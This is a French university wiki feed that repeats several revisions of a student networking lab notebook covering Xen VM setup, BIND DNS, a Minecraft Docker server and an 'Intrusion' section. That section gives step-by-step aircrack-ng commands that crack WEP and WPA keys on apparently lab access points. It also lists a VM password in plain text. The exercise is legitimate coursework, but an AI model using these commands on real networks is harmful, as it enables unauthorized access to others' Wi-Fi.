Wiki d'activités IMA - Contributions de l’utilisateur [fr]

Fichier:WPA crack.png

2022-11-28T16:30:20Z

Hguyard :

TP sysres SE2a5 2022/2023 G1

2022-11-28T16:29:43Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]
* [[#Intrusion|Intrusion]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

== WPA ==

Nous allons utiliser le même logiciel que pour WEP (aircrack)

Pour recuperer la clé WPA, il faut attendre un handshake de krakote01
airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa

Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)
crunch 8 8 0123456789 -o password.lst

Il nous reste plus qu'a utiliser aircrack comme ceci
aircrack-ng -w password.lst wpa02.cap

Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.

Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti

Après 4 heures 1 minutes et 29 seconde nous avons la clé:
66699666

[[Fichier:WPA_crack.png]]

=MINECRAFT=

Nous allons installer un serveur minecraft sur notre VM

Pour cela nous allons avoir besoin de DOCKER
apt-get install docker

Une fois l'installation faite nous devons prendre une image de serveur minecraft:
docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server

Cette image vient du github: https://github.com/itzg/docker-minecraft-server

Nous mettons le port 25565 car c'est le port utilisé par minecraft

Une fois cela fait nous pouvons visualiser les docker activité
docker ps

[[Fichier:docker_minecraft.png]]

==Connexion==

Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur

[[Fichier:minecraft_pc.png]]

Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.

Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.

Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop "consommer"

TP sysres SE2a5 2022/2023 G1

2022-11-28T12:57:00Z

Hguyard : /* WPA */

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]
* [[#Intrusion|Intrusion]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

== WPA ==

Nous allons utiliser le même logiciel que pour WEP (aircrack)

Pour recuperer la clé WPA, il faut attendre un handshake de krakote01
airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa

Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)
crunch 8 8 0123456789 -o password.lst

Il nous reste plus qu'a utiliser aircrack comme ceci
aircrack-ng -w password.lst wpa02.cap

Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.

Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti

=MINECRAFT=

Nous allons installer un serveur minecraft sur notre VM

Pour cela nous allons avoir besoin de DOCKER
apt-get install docker

Une fois l'installation faite nous devons prendre une image de serveur minecraft:
docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server

Cette image vient du github: https://github.com/itzg/docker-minecraft-server

Nous mettons le port 25565 car c'est le port utilisé par minecraft

Une fois cela fait nous pouvons visualiser les docker activité
docker ps

[[Fichier:docker_minecraft.png]]

==Connexion==

Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur

[[Fichier:minecraft_pc.png]]

Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.

Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.

Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop "consommer"

Fichier:Minecraft pc.png

2022-11-28T10:52:38Z

Hguyard :

TP sysres SE2a5 2022/2023 G1

2022-11-28T10:52:05Z

Hguyard : /* MINECRAFT */

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]
* [[#Intrusion|Intrusion]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

== WPA ==

Nous allons utiliser le même logiciel que pour WEP (aircrack)

=MINECRAFT=

Nous allons installer un serveur minecraft sur notre VM

Pour cela nous allons avoir besoin de DOCKER
apt-get install docker

Une fois l'installation faite nous devons prendre une image de serveur minecraft:
docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server

Cette image vient du github: https://github.com/itzg/docker-minecraft-server

Nous mettons le port 25565 car c'est le port utilisé par minecraft

Une fois cela fait nous pouvons visualiser les docker activité
docker ps

[[Fichier:docker_minecraft.png]]

==Connexion==

Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur

[[Fichier:minecraft_pc.png]]

Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.

Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.

Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop "consommer"

Fichier:Docker minecraft.png

2022-11-28T10:34:30Z

Hguyard :

TP sysres SE2a5 2022/2023 G1

2022-11-28T10:34:15Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]
* [[#Intrusion|Intrusion]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]

On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :
lvcreate -L10G -n HG-home storage
lvcreate -L10G -n HG-var storage

Dans /etc/xen/HG.cfg :
# Disk device(s).
#
root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',
'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',
'phy:/dev/storage/HG-home,xvdb1,w',
'phy:/dev/storage/HG-var,xvdc1,w',
]

Pour demarrer notre VM nous utilisons :
xen create /etc/xen/HG.cfg -c

Le -c sert a se connecter directement

Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:
/dev/xvda3 /home ext4 defaults 0 2
/dev/xvda4 /var ext4 defaults 0 2

On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:
mkfs.ext4 /dev/xdva3

== Serveur DNS ==

Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine <code>detestable.site</code>. 
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records : 
→ Ajouter le Glue Record vers <code>193.48.57.163</code> afin d’associer le nom de domaine <code>detestable.site</code> à l’adresse IP <code>193.48.57.163</code> 
→ Modifier les serveurs de noms pour utiliser <code>ns.detestable.site</code> et <code>ns6.gandi.net</code> 
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS : 
→ Modifier l’enrgistrement DNS <code>@</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Ajouter l’enrgistrement DNS <code>ns</code>-<code>A</code> avec la valeur <code>193.48.57.193</code> 
→ Modifier l’enrgistrement DNS <code>www</code>-<code>CNAME</code> avec la valeur <code>ns.detestable.site.</code>

* Installation du paquet <code>bind9</code>

<pre>apt install bind9</pre>
* Modification du fichier <code>/etc/resolv.conf</code> :

<pre>nameserver 127.0.0.1</pre>
* Modification du fichier <code>/etc/bind/named.conf.local</code> :

<pre>zone "detestable.site" {
type master;
file "/etc/bind/db.detestable.site";
allow-transfer { 217.70.177.40; }; // ns6.gandi.net
};</pre>
* Modification du fichier <code>/etc/bind/named.conf.options</code> :

<pre>options{
directory "/var/cache/bind";
forwarders {
8.8.8.8;
4.4.2.2;
};
dnssec-validation auto;
listen-on-v6 { any; };
allow-transfer { "allowed_to_transfer"; };
};
acl "allowed_to_transfer" {
217.70.177.40/32;
};</pre>
* Créer le fichier BIND pour <code>detestable.site</code> :

<pre>cp /etc/bind/db.local /etc/bind/db.detestable.site</pre>
* Modification du fichier <code>/etc/bind/db.detestable.site</code> :

<pre>;
; BIND data file for detestable.site
;
$TTL 604800
@ IN SOA ns.detestable.site. root.detestable.site. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.detestable.site.
@ IN NS ns6.gandi.net.
@ IN A 193.48.57.163
NS IN A 193.48.57.163
NS IN AAAA 2001:660:4401:60a0:216:3eff:fe82:3e78
WWW IN CNAME NS
SSH IN CNAME NS</pre>
* Redémarrage du service <code>bind9</code> :

<pre>service bind9 restart</pre>
=== Tester DNS : ===

* Modification du fichier <code>/etc/resolv.conf</code>

<pre>nameserver 193.48.57.163</pre>
* Vérification de la traduction du nom de domaine <code>detestable.site</code> :

<pre>nslookup detestable.site</pre>

= Intrusion =

== WEP ==

Pour casser une clé WEP il nous faut le logiciel Aircrack:
apt-get install aircrack-ng

Il faut tout d'abord se mettre sur la bonne interface ethernet:
airmon-ng start wlan0mon

On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)
airodump-ng --encrypt wep wlan0mon

On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)

(Ne pas juger la qualité du photographe)
[[Fichier:WEP_Liste.jpg]]

On s'identifie
aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon

Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :
airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon

Nous procédons maintenant a la fausse identification:
aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon

Il ne reste plus qu'a lancer le crack de la clé
aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap

Resultat:

[[Fichier:cléWEP.jpeg]]

== WPA ==

Nous allons utiliser le même logiciel que pour WEP (aircrack)

=MINECRAFT=

Nous allons installer un serveur minecraft sur notre VM

Pour cela nous allons avoir besoin de DOCKER
apt-get install docker

Une fois l'installation faite nous devons prendre une image de serveur minecraft:
docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server

Cette image vient du github: https://github.com/itzg/docker-minecraft-server

Nous mettons le port 25565 car c'est le port utilisé par minecraft

Une fois cela fait nous pouvons visualiser les docker activité
docker ps

[[Fichier:docker_minecraft.png]]

Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.

Cela doit être du (pour la TNT) a un trop gros changement de map et besoin d'affichage qui necessite trop de memoire vive.

Pour la redstone, etant donné que nous avons essayé de recréer des portes logique, cela devait trop "consommer"

TP sysres SE2a5 2022/2023 G1

2022-11-28T09:59:20Z

Hguyard :

== Cahier de suivi - Groupe 1 ==
= Sommaire =

* [[#plan-dadressage|Plan d’adressage]]
* [[#machine-virtuelle|Machine Virtuelle]]
* [[#Intrusion|Intrusion]]

= Plan d’adressage =

{| class="wikitable"
! Groupe !! VLAN !! Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV routée !! Nom de domaine !
|-
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site
|}

= Machine Virtuelle =

== Création de la VM ==

Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va "heberger" notre VM xen
ssh root@capbreton.plil.info

On crée ensuite notre vm avec :
xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye

Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :
